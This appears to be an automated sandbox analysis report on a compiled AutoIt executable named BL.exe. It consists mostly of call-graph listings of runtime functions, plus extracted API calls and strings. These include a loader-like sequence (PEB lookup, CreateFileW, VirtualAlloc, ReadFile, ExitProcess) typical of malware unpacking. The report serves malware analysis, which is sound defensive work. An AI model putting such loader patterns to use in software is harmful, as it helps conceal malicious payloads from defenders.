85950->85946 85959 425ce4 85951->85959 85953 414de1 85953->85943 85954->85928 85956->85934 85957->85936 85958->85938 85961 425cf0 __wfsopen 85959->85961 85960 425d03 85962 417f23 __wcstombs_l_helper 67 API calls 85960->85962 85961->85960 85963 425d41 85961->85963 85964 425d08 85962->85964 85965 4255c4 __tsopen_nolock 132 API calls 85963->85965 85966 417ebb __wcstombs_l_helper 6 API calls 85964->85966 85967 425d5b 85965->85967 85968 425d17 __wfsopen 85966->85968 85969 425d82 __sopen_helper LeaveCriticalSection 85967->85969 85968->85953 85969->85968 85971 415588 __wfsopen 85970->85971 85972 415596 85971->85972 85974 4155c4 85971->85974 86001 417f23 67 API calls __getptd_noexit 85972->86001 85983 415965 85974->85983 85975 41559b 86002 417ebb 6 API calls 2 library calls 85975->86002 85982 4155ab __wfsopen 85982->85831 85984 415977 85983->85984 85985 415999 EnterCriticalSection 85983->85985 85984->85985 85986 41597f 85984->85986 85987 4155cc 85985->85987 85988 418407 __lock 67 API calls 85986->85988 85989 4154f2 85987->85989 85988->85987 85990 415512 85989->85990 85991 415502 85989->85991 85993 415524 85990->85993 86004 4152e7 85990->86004 86058 417f23 67 API calls __getptd_noexit 85991->86058 86021 41486c 85993->86021 85994 415507 86003 4155f7 LeaveCriticalSection LeaveCriticalSection _fprintf 85994->86003 86001->85975 86003->85982 86005 41531a 86004->86005 86006 4152fa 86004->86006 86007 41453a __fileno 67 API calls 86005->86007 86059 417f23 67 API calls __getptd_noexit 86006->86059 86009 415320 86007->86009 86012 41efd4 __locking 71 API calls 86009->86012 86010 4152ff 86060 417ebb 6 API calls 2 library calls 86010->86060 86014 415335 86012->86014 86013 41530f 86013->85993 86014->86013 86015 4153a9 86014->86015 86017 415364 86014->86017 86061 417f23 67 API calls __getptd_noexit 86015->86061 86017->86013 86018 41efd4 __locking 71 API calls 86017->86018 86019 415404 86018->86019 86019->86013 86020 41efd4 __locking 71 API calls 86019->86020 86020->86013 86022 4148a7 86021->86022 86023 414885 86021->86023 86027 41453a 86022->86027 86023->86022 86024 41453a __fileno 67 API calls 86023->86024 86025 4148a0 86024->86025 86062 41c3cf 101 API calls 5 library calls 86025->86062 86028 41455e 86027->86028 86029 414549 86027->86029 86033 41efd4 86028->86033 86063 417f23 67 API calls __getptd_noexit 86029->86063 86031 41454e 86064 417ebb 6 API calls 2 library calls 86031->86064 86034 41efe0 __wfsopen 86033->86034 86035 41f003 86034->86035 86036 41efe8 86034->86036 86037 41f011 86035->86037 86042 41f052 86035->86042 86085 417f36 67 API calls __getptd_noexit 86036->86085 86087 417f36 67 API calls __getptd_noexit 86037->86087 86040 41efed 86086 417f23 67 API calls __getptd_noexit 86040->86086 86041 41f016 86088 417f23 67 API calls __getptd_noexit 86041->86088 86065 41ba3b 86042->86065 86046 41eff5 __wfsopen 86046->85994 86047 41f01d 86089 417ebb 6 API calls 2 library calls 86047->86089 86048 41f058 86050 41f065 86048->86050 86051 41f07b 86048->86051 86075 41ef5f 86050->86075 86090 417f23 67 API calls __getptd_noexit 86051->86090 86054 41f080 86091 417f36 67 API calls __getptd_noexit 86054->86091 86055 41f073 86092 41f0a6 LeaveCriticalSection __unlock_fhandle 86055->86092 86058->85994 86059->86010 86061->86013 86062->86022 86063->86031 86066 41ba47 __wfsopen 86065->86066 86067 41baa2 86066->86067 86070 418407 __lock 67 API calls 86066->86070 86068 41bac4 __wfsopen 86067->86068 86069 41baa7 EnterCriticalSection 86067->86069 86068->86048 86069->86068 86071 41ba73 86070->86071 86072 41ba8a 86071->86072 86073 4189e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 86071->86073 86074 41bad2 ___lock_fhandle LeaveCriticalSection 86072->86074 86073->86072 86074->86067 86076 41b9c4 __chsize_nolock 67 API calls 86075->86076 86077 41ef6e 86076->86077 86078 41ef84 SetFilePointer 86077->86078 86079 41ef74 86077->86079 86080 41ef9b GetLastError 86078->86080 86083 41efa3 86078->86083 86081 417f23 __wcstombs_l_helper 67 API calls 86079->86081 86080->86083 86082 41ef79 86081->86082 86082->86055 86083->86082 86084 417f49 __dosmaperr 67 API calls 86083->86084 86084->86082 86085->86040 86086->86046 86087->86041 86088->86047 86090->86054 86091->86055 86092->86046 86094 414e31 86093->86094 86095 414e4d 86093->86095 86139 417f23 67 API calls __getptd_noexit 86094->86139 86097 41486c __flush 101 API calls 86095->86097 86102 414e46 86095->86102 86099 414e59 86097->86099 86098 414e36 86140 417ebb 6 API calls 2 library calls 86098->86140 86112 41e680 86099->86112 86111 414f08 LeaveCriticalSection LeaveCriticalSection _fprintf 86102->86111 86104 41453a __fileno 67 API calls 86105 414e67 86104->86105 86116 41e5b3 86105->86116 86107 414e6d 86107->86102 86108 413a88 __getptd_noexit 67 API calls 86107->86108 86108->86102 86109->85842 86111->85846 86113 414e61 86112->86113 86114 41e690 86112->86114 86113->86104 86114->86113 86115 413a88 __getptd_noexit 67 API calls 86114->86115 86115->86113 86117 41e5bf __wfsopen 86116->86117 86118 41e5e2 86117->86118 86119 41e5c7 86117->86119 86121 41e5f0 86118->86121 86125 41e631 86118->86125 86156 417f36 67 API calls __getptd_noexit 86119->86156 86158 417f36 67 API calls __getptd_noexit 86121->86158 86123 41e5cc 86157 417f23 67 API calls __getptd_noexit 86123->86157 86124 41e5f5 86159 417f23 67 API calls __getptd_noexit 86124->86159 86128 41ba3b ___lock_fhandle 68 API calls 86125->86128 86130 41e637 86128->86130 86129 41e5fc 86160 417ebb 6 API calls 2 library calls 86129->86160 86132 41e652 86130->86132 86133 41e644 86130->86133 86161 417f23 67 API calls __getptd_noexit 86132->86161 86141 41e517 86133->86141 86134 41e5d4 __wfsopen 86134->86107 86137 41e64c 86162 41e676 LeaveCriticalSection __unlock_fhandle 86137->86162 86139->86098 86163 41b9c4 86141->86163 86143 41e57d 86176 41b93e 68 API calls 2 library calls 86143->86176 86144 41e527 86144->86143 86147 41b9c4 __chsize_nolock 67 API calls 86144->86147 86155 41e55b 86144->86155 86146 41e585 86154 41e5a7 86146->86154 86177 417f49 67 API calls 3 library calls 86146->86177 86149 41e552 86147->86149 86148 41b9c4 __chsize_nolock 67 API calls 86150 41e567 CloseHandle 86148->86150 86152 41b9c4 __chsize_nolock 67 API calls 86149->86152 86150->86143 86153 41e573 GetLastError 86150->86153 86152->86155 86153->86143 86154->86137 86155->86143 86155->86148 86156->86123 86157->86134 86158->86124 86159->86129 86161->86137 86162->86134 86164 41b9d1 86163->86164 86165 41b9e9 86163->86165 86166 417f36 __locking 67 API calls 86164->86166 86168 417f36 __locking 67 API calls 86165->86168 86170 41ba2e 86165->86170 86167 41b9d6 86166->86167 86169 417f23 __wcstombs_l_helper 67 API calls 86167->86169 86171 41ba17 86168->86171 86173 41b9de 86169->86173 86170->86144 86172 417f23 __wcstombs_l_helper 67 API calls 86171->86172 86174 41ba1e 86172->86174 86173->86144 86175 417ebb __wcstombs_l_helper 6 API calls 86174->86175 86175->86170 86176->86146 86177->86154 86179 415126 __wfsopen 86178->86179 86180 41516f 86179->86180 86181 41513a _memset 86179->86181 86190 415164 __wfsopen 86179->86190 86182 415965 __lock_file 68 API calls 86180->86182 86207 417f23 67 API calls __getptd_noexit 86181->86207 86183 415177 86182->86183 86191 414f10 86183->86191 86186 415154 86208 417ebb 6 API calls 2 library calls 86186->86208 86190->85851 86194 414f2e _memset 86191->86194 86197 414f4c 86191->86197 86192 414f37 86260 417f23 67 API calls __getptd_noexit 86192->86260 86194->86192 86194->86197 86203 414f8b 86194->86203 86195 414f3c 86261 417ebb 6 API calls 2 library calls 86195->86261 86209 4151a6 LeaveCriticalSection LeaveCriticalSection _fprintf 86197->86209 86199 4150d5 _memset 86264 417f23 67 API calls __getptd_noexit 86199->86264 86200 4150a9 _memset 86263 417f23 67 API calls __getptd_noexit 86200->86263 86201 41453a __fileno 67 API calls 86201->86203 86203->86197 86203->86199 86203->86200 86203->86201 86210 41ed9e 86203->86210 86240 41e6b1 86203->86240 86262 41ee9b 67 API calls 3 library calls 86203->86262 86207->86186 86209->86190 86211 41edaa __wfsopen 86210->86211 86212 41edb2 86211->86212 86213 41edcd 86211->86213 86334 417f36 67 API calls __getptd_noexit 86212->86334 86215 41eddb 86213->86215 86218 41ee1c 86213->86218 86336 417f36 67 API calls __getptd_noexit 86215->86336 86216 41edb7 86335 417f23 67 API calls __getptd_noexit 86216->86335 86221 41ee29 86218->86221 86222 41ee3d 86218->86222 86220 41ede0 86337 417f23 67 API calls __getptd_noexit 86220->86337 86339 417f36 67 API calls __getptd_noexit 86221->86339 86225 41ba3b ___lock_fhandle 68 API calls 86222->86225 86227 41ee43 86225->86227 86226 41ee2e 86340 417f23 67 API calls __getptd_noexit 86226->86340 86229 41ee50 86227->86229 86230 41ee66 86227->86230 86265 41e7dc 86229->86265 86341 417f23 67 API calls __getptd_noexit 86230->86341 86232 41ede7 86338 417ebb 6 API calls 2 library calls 86232->86338 86235 41edbf __wfsopen 86235->86203 86236 41ee5e 86343 41ee91 LeaveCriticalSection __unlock_fhandle 86236->86343 86237 41ee6b 86342 417f36 67 API calls __getptd_noexit 86237->86342 86241 41e6c1 86240->86241 86244 41e6de 86240->86244 86347 417f23 67 API calls __getptd_noexit 86241->86347 86243 41e6c6 86348 417ebb 6 API calls 2 library calls 86243->86348 86246 41e713 86244->86246 86252 41e6d6 86244->86252 86344 423600 86244->86344 86248 41453a __fileno 67 API calls 86246->86248 86249 41e727 86248->86249 86250 41ed9e __read 79 API calls 86249->86250 86251 41e72e 86250->86251 86251->86252 86253 41453a __fileno 67 API calls 86251->86253 86252->86203 86254 41e751 86253->86254 86254->86252 86255 41453a __fileno 67 API calls 86254->86255 86256 41e75d 86255->86256 86256->86252 86257 41453a __fileno 67 API calls 86256->86257 86258 41e769 86257->86258 86259 41453a __fileno 67 API calls 86258->86259 86259->86252 86260->86195 86262->86203 86263->86195 86264->86195 86266 41e813 86265->86266 86267 41e7f8 86265->86267 86269 41e822 86266->86269 86272 41e849 86266->86272 86268 417f36 __locking 67 API calls 86267->86268 86271 41e7fd 86268->86271 86270 417f36 __locking 67 API calls 86269->86270 86273 41e827 86270->86273 86275 417f23 __wcstombs_l_helper 67 API calls 86271->86275 86274 41e868 86272->86274 86285 41e87c 86272->86285 86276 417f23 __wcstombs_l_helper 67 API calls 86273->86276 86277 417f36 __locking 67 API calls 86274->86277 86286 41e805 86275->86286 86279 41e82e 86276->86279 86281 41e86d 86277->86281 86278 41e8d4 86280 417f36 __locking 67 API calls 86278->86280 86282 417ebb __wcstombs_l_helper 6 API calls 86279->86282 86283 41e8d9 86280->86283 86284 417f23 __wcstombs_l_helper 67 API calls 86281->86284 86282->86286 86287 417f23 __wcstombs_l_helper 67 API calls 86283->86287 86288 41e874 86284->86288 86285->86278 86285->86286 86289 41e8b0 86285->86289 86290 41e8f5 86285->86290 86286->86236 86287->86288 86291 417ebb __wcstombs_l_helper 6 API calls 86288->86291 86289->86278 86297 41e8bb ReadFile 86289->86297 86292 416fb6 __malloc_crt 67 API calls 86290->86292 86291->86286 86294 41e90b 86292->86294 86300 41e931 86294->86300 86301 41e913 86294->86301 86295 41ed62 GetLastError 86298 41ebe8 86295->86298 86299 41ed6f 86295->86299 86296 41e9e7 86296->86295 86304 41e9fb 86296->86304 86297->86295 86297->86296 86308 417f49 __dosmaperr 67 API calls 86298->86308 86313 41eb6d 86298->86313 86302 417f23 __wcstombs_l_helper 67 API calls 86299->86302 86305 423462 __lseeki64_nolock 69 API calls 86300->86305 86303 417f23 __wcstombs_l_helper 67 API calls 86301->86303 86306 41ed74 86302->86306 86307 41e918 86303->86307 86304->86313 86314 41ea17 86304->86314 86317 41ec2d 86304->86317 86309 41e93d 86305->86309 86310 417f36 __locking 67 API calls 86306->86310 86311 417f36 __locking 67 API calls 86307->86311 86308->86313 86309->86297 86310->86313 86311->86286 86312 413a88 __getptd_noexit 67 API calls 86312->86286 86313->86286 86313->86312 86315 41ea7d ReadFile 86314->86315 86322 41eafa 86314->86322 86318 41ea9b GetLastError 86315->86318 86327 41eaa5 86315->86327 86316 41eca5 ReadFile 86319 41ecc4 GetLastError 86316->86319 86325 41ecce 86316->86325 86317->86313 86317->86316 86318->86314 86318->86327 86319->86317 86319->86325 86320 41ebbe MultiByteToWideChar 86320->86313 86321 41ebe2 GetLastError 86320->86321 86321->86298 86322->86313 86323 41eb75 86322->86323 86324 41eb68 86322->86324 86330 41eb32 86322->86330 86323->86330 86331 41ebac 86323->86331 86326 417f23 __wcstombs_l_helper 67 API calls 86324->86326 86325->86317 86329 423462 __lseeki64_nolock 69 API calls 86325->86329 86326->86313 86327->86314 86328 423462 __lseeki64_nolock 69 API calls 86327->86328 86328->86327 86329->86325 86330->86320 86332 423462 __lseeki64_nolock 69 API calls 86331->86332 86333 41ebbb 86332->86333 86333->86320 86334->86216 86335->86235 86336->86220 86337->86232 86339->86226 86340->86232 86341->86237 86342->86236 86343->86235 86345 416fb6 __malloc_crt 67 API calls 86344->86345 86346 423615 86345->86346 86346->86246 86347->86243 86352 414cef GetSystemTimeAsFileTime __aulldiv 86349->86352 86351 4431ef 86351->85854 86352->86351 86353->85862 86355->85867 86359 4523e1 _wcscpy 86356->86359 86357 44afdc GetSystemTimeAsFileTime 86357->86359 86358 452553 86358->85784 86358->85785 86359->86357 86359->86358 86360 4151b0 81 API calls __fread_nolock 86359->86360 86361 41557c 105 API calls _fseek 86359->86361 86360->86359 86361->86359 86363 44b1b4 86362->86363 86364 44b1a6 86362->86364 86366 44b1ca 86363->86366 86367 414e06 138 API calls 86363->86367 86368 44b1c2 86363->86368 86365 414e06 138 API calls 86364->86365 86365->86363 86397 4352d1 81 API calls 2 library calls 86366->86397 86369 44b2c1 86367->86369 86368->85813 86369->86366 86371 44b2cf 86369->86371 86375 44b2dc 86371->86375 86376 414e94 __fcloseall 106 API calls 86371->86376 86372 44b20d 86373 44b211 86372->86373 86374 44b23b 86372->86374 86378 414e94 __fcloseall 106 API calls 86373->86378 86380 44b21e 86373->86380 86398 43526e 86374->86398 86375->85813 86376->86375 86378->86380 86379 44b242 86382 44b270 86379->86382 86383 44b248 86379->86383 86381 414e94 __fcloseall 106 API calls 86380->86381 86385 44b22e 86380->86385 86381->86385 86408 44b0af 111 API calls 86382->86408 86386 44b255 86383->86386 86389 414e94 __fcloseall 106 API calls 86383->86389 86385->85813 86387 44b265 86386->86387 86390 414e94 __fcloseall 106 API calls 86386->86390 86387->85813 86388 44b276 86409 43522c 67 API calls __getptd_noexit 86388->86409 86389->86386 86390->86387 86392 44b27c 86393 44b289 86392->86393 86394 414e94 __fcloseall 106 API calls 86392->86394 86395 44b299 86393->86395 86396 414e94 __fcloseall 106 API calls 86393->86396 86394->86393 86395->85813 86396->86395 86397->86372 86399 4138ba _malloc 67 API calls 86398->86399 86400 43527d 86399->86400 86401 4138ba _malloc 67 API calls 86400->86401 86402 43528d 86401->86402 86403 4138ba _malloc 67 API calls 86402->86403 86404 43529d 86403->86404 86406 4352bc 86404->86406 86410 43522c 67 API calls __getptd_noexit 86404->86410 86406->86379 86407 4352c8 86407->86379 86408->86388 86409->86392 86410->86407 86411->85700 86412->85702 86413->85721 86414->85721 86415->85721 86416->85715 86417->85721 86418->85721 86419->85725 86420->85734 86422->85736 86423->85625 86425 410148 SHGetDesktopFolder 86424->86425 86426 4101a3 _wcscpy 86424->86426 86425->86426 86427 41015a _wcscpy 86425->86427 86426->85629 86427->86426 86428 41018a SHGetPathFromIDListW 86427->86428 86428->86426 86429->85631 86431 40f5e0 152 API calls 86430->86431 86432 40f417 86431->86432 86433 42ca37 86432->86433 86434 40f42c 86432->86434 86435 42ca1f 86432->86435 86436 452574 140 API calls 86433->86436 86468 4037e0 139 API calls 7 library calls 86434->86468 86469 43717f 110 API calls _printf 86435->86469 86439 42ca50 86436->86439 86442 42ca76 86439->86442 86443 42ca54 86439->86443 86440 40f446 86440->85628 86441 42ca2d 86441->86433 86444 41171a 75 API calls 86442->86444 86445 434fe1 106 API calls 86443->86445 86457 42cacc moneypunct 86444->86457 86446 42ca5e 86445->86446 86470 43717f 110 API calls _printf 86446->86470 86448 42ccc3 86450 413a88 __getptd_noexit 67 API calls 86448->86450 86449 42ca6c 86449->86442 86451 42cccd 86450->86451 86452 434fe1 106 API calls 86451->86452 86453 42ccda 86452->86453 86457->86448 86458 401b70 75 API calls 86457->86458 86461 402cc0 75 API calls 2 library calls 86457->86461 86462 4026a0 86457->86462 86471 445051 75 API calls _memcpy_s 86457->86471 86472 44c80c 87 API calls 3 library calls 86457->86472 86473 44b408 75 API calls 86457->86473 86458->86457 86461->86457 86463 4026af 86462->86463 86466 40276b 86462->86466 86464 41171a 75 API calls 86463->86464 86463->86466 86467 4026ee moneypunct 86463->86467 86464->86467 86465 41171a 75 API calls 86465->86467 86466->86457 86467->86465 86467->86466 86468->86440 86469->86441 86470->86449 86471->86457 86472->86457 86473->86457 86474->85639 86475->85638 86477 401bfb 86476->86477 86497 401cde 86476->86497 86499 4013a0 86477->86499 86480 42a9a0 LoadStringW 86483 42a9bb 86480->86483 86481 401c18 86482 4021e0 75 API calls 86481->86482 86484 401c2d 86482->86484 86505 40df50 75 API calls 86483->86505 86486 401c3a 86484->86486 86487 42a9cd 86484->86487 86486->86483 86488 401c44 86486->86488 86506 40d3b0 75 API calls 2 library calls 86487->86506 86504 40d3b0 75 API calls 2 library calls 86488->86504 86491 42a9dc 86492 42a9f0 86491->86492 86494 401c53 _memset _wcscpy _wcsncpy 86491->86494 86507 40d3b0 75 API calls 2 library calls 86492->86507 86496 401cc2 Shell_NotifyIconW 86494->86496 86495 42a9fe 86496->86497 86497->85650 86498->85644 86500 41171a 75 API calls 86499->86500 86501 4013c4 86500->86501 86502 401380 75 API calls 86501->86502 86503 4013d3 86502->86503 86503->86480 86503->86481 86504->86494 86505->86494 86506->86491 86507->86495 86508 3ddc3b8 86522 3dda008 86508->86522 86510 3ddc47f 86525 3ddc2a8 86510->86525 86512 3ddc4a8 CreateFileW 86514 3ddc4fc 86512->86514 86515 3ddc4f7 86512->86515 86514->86515 86516 3ddc513 VirtualAlloc 86514->86516 86516->86515 86517 3ddc531 ReadFile 86516->86517 86517->86515 86518 3ddc54c 86517->86518 86519 3ddb2a8 13 API calls 86518->86519 86521 3ddc57f 86519->86521 86520 3ddc5a2 ExitProcess 86520->86515 86521->86520 86528 3ddd4a8 GetPEB 86522->86528 86524 3dda693 86524->86510 86526 3ddc2b1 Sleep 86525->86526 86527 3ddc2bf 86526->86527 86529 3ddd4d2 86528->86529 86529->86524 86530 444343 86533 444326 86530->86533 86532 44434e WriteFile 86534 444340 86533->86534 86535 4442c7 86533->86535 86534->86532 86540 40e190 SetFilePointerEx 86535->86540 86537 4442e0 SetFilePointerEx 86541 40e190 SetFilePointerEx 86537->86541 86539 4442ff 86539->86532 86540->86537 86541->86539 86542 46d22f 86545 46d098 86542->86545 86544 46d241 86546 46d0b5 86545->86546 86547 46d115 86546->86547 86548 46d0b9 86546->86548 86596 45c216 78 API calls 86547->86596 86549 41171a 75 API calls 86548->86549 86551 46d0c0 86549->86551 86553 46d0cc 86551->86553 86593 40d940 76 API calls 86551->86593 86552 46d126 86554 46d0f8 86552->86554 86561 46d142 86552->86561 86558 453063 111 API calls 86553->86558 86555 4092c0 VariantClear 86554->86555 86557 46d0fd 86555->86557 86557->86544 86559 46d0dd 86558->86559 86594 40dfa0 83 API calls 86559->86594 86562 46d1c8 86561->86562 86563 46d158 86561->86563 86601 4676a3 78 API calls 86562->86601 86566 453063 111 API calls 86563->86566 86564 46d0ea 86564->86561 86567 46d0ee 86564->86567 86572 46d15e 86566->86572 86567->86554 86595 44ade5 CloseHandle moneypunct 86567->86595 86568 46d1ce 86602 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 86568->86602 86569 46d18d 86597 467fce 82 API calls 86569->86597 86571 46d196 86576 4013a0 75 API calls 86571->86576 86572->86569 86572->86571 86575 46d194 86583 46d224 86575->86583 86589 40d900 86575->86589 86578 46d1a2 86576->86578 86577 46d1e7 86577->86575 86580 4092c0 VariantClear 86577->86580 86598 40df50 75 API calls 86578->86598 86580->86575 86581 46d1ac 86599 40d3b0 75 API calls 2 library calls 86581->86599 86583->86544 86584 46d1b8 86600 467fce 82 API calls 86584->86600 86587 46d216 86603 44ade5 CloseHandle moneypunct 86587->86603 86590 40d917 86589->86590 86591 40d909 86589->86591 86590->86591 86592 40d91c CloseHandle 86590->86592 86591->86587 86592->86587 86593->86553 86594->86564 86595->86554 86596->86552 86597->86575 86598->86581 86599->86584 86600->86575 86601->86568 86602->86577 86603->86583 86604 42919b 86609 40ef10 86604->86609 86607 411421 __cinit 74 API calls 86608 4291aa 86607->86608 86610 41171a 75 API calls 86609->86610 86611 40ef17 86610->86611 86612 42ad48 86611->86612 86617 40ef40 74 API calls __cinit 86611->86617 86614 40ef2a 86618 40e470 86614->86618 86617->86614 86619 40c060 75 API calls 86618->86619 86620 40e483 GetVersionExW 86619->86620 86621 4021e0 75 API calls 86620->86621 86622 40e4bb 86621->86622 86644 40e600 86622->86644 86628 42accc 86630 42ad28 GetSystemInfo 86628->86630 86633 42ad38 GetSystemInfo 86630->86633 86631 40e557 GetCurrentProcess 86664 40ee30 LoadLibraryA GetProcAddress 86631->86664 86636 40e5c9 86661 40eea0 86636->86661 86638 40e56c 86638->86633 86657 40eee0 86638->86657 86640 40e5e0 86642 40e5f1 FreeLibrary 86640->86642 86643 40e5f4 86640->86643 86641 40e5dd FreeLibrary 86641->86640 86642->86643 86643->86607 86645 40e60b 86644->86645 86646 40c740 75 API calls 86645->86646 86647 40e4c2 86646->86647 86648 40e620 86647->86648 86650 40e62a 86648->86650 86649 42ac93 86650->86649 86651 40c740 75 API calls 86650->86651 86652 40e4ce 86651->86652 86652->86628 86653 40ee70 86652->86653 86654 40e551 86653->86654 86655 40ee76 LoadLibraryA 86653->86655 86654->86631 86654->86638 86655->86654 86656 40ee87 GetProcAddress 86655->86656 86656->86654 86658 40e5bf 86657->86658 86659 40eee6 LoadLibraryA 86657->86659 86658->86630 86658->86636 86659->86658 86660 40eef7 GetProcAddress 86659->86660 86660->86658 86665 40eec0 LoadLibraryA GetProcAddress 86661->86665 86663 40e5d3 GetNativeSystemInfo 86663->86640 86663->86641 86664->86638 86665->86663 86666 4733ec 86667 4733fd 86666->86667 86670 473436 86666->86670 86667->86670 86671 47340d 86667->86671 86668 453063 111 API calls 86669 473457 86668->86669 86678 4723ab 86669->86678 86670->86668 86674 4092c0 VariantClear 86671->86674 86673 473486 86675 47348f 86673->86675 86677 4092c0 VariantClear 86673->86677 86676 473416 86674->86676 86677->86675 86679 4092c0 VariantClear 86678->86679 86680 4723b7 86679->86680 86681 41171a 75 API calls 86680->86681 86682 4723be 86681->86682 86685 46edc6 86682->86685 86684 4723d9 86684->86673 86686 45335b 76 API calls 86685->86686 86689 46eddb 86686->86689 86687 401cf0 75 API calls 86687->86689 86688 46ee27 86690 46ee36 86688->86690 86692 401cf0 75 API calls 86688->86692 86689->86687 86689->86688 86711 46f1ed 86689->86711 86691 41171a 75 API calls 86690->86691 86693 46ee64 86691->86693 86692->86690 86694 40c060 75 API calls 86693->86694 86695 46ee95 86694->86695 86696 40c060 75 API calls 86695->86696 86697 46ee9e 86696->86697 86698 40c060 75 API calls 86697->86698 86705 46eea7 86698->86705 86699 46f19c 86700 41171a 75 API calls 86699->86700 86704 46f264 _memset 86699->86704 86702 46f1de 86700->86702 86701 4021e0 75 API calls 86701->86705 86703 41171a 75 API calls 86702->86703 86703->86704 86704->86684 86705->86699 86705->86701 86706 4134d9 78 API calls 86705->86706 86707 403470 75 API calls 86705->86707 86708 41349d 78 API calls 86705->86708 86709 413431 78 API calls 86705->86709 86705->86711 86712 40df50 75 API calls 86705->86712 86706->86705 86707->86705 86708->86705 86709->86705 86711->86684 86712->86705 86713 40116e 86714 401119 DefWindowProcW 86713->86714

                                                                                                                            Executed Functions

                                                                                                                            Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                              • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BL.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                              • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                            • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\BL.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                              • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\BL.exe,00000004), ref: 0040D7D6
                                                                                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\BL.exe,00000004), ref: 00431B0E
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\BL.exe,00000004), ref: 00431B3F
                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                            • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                              • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                              • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                              • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                              • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                              • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                              • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                            • String ID: @GH$@GH$C:\Users\user\Desktop\BL.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                            • API String ID: 2493088469-2479709004
                                                                                                                            • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                            • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                            • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                            • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                                                            Function 0040E470 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 165COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
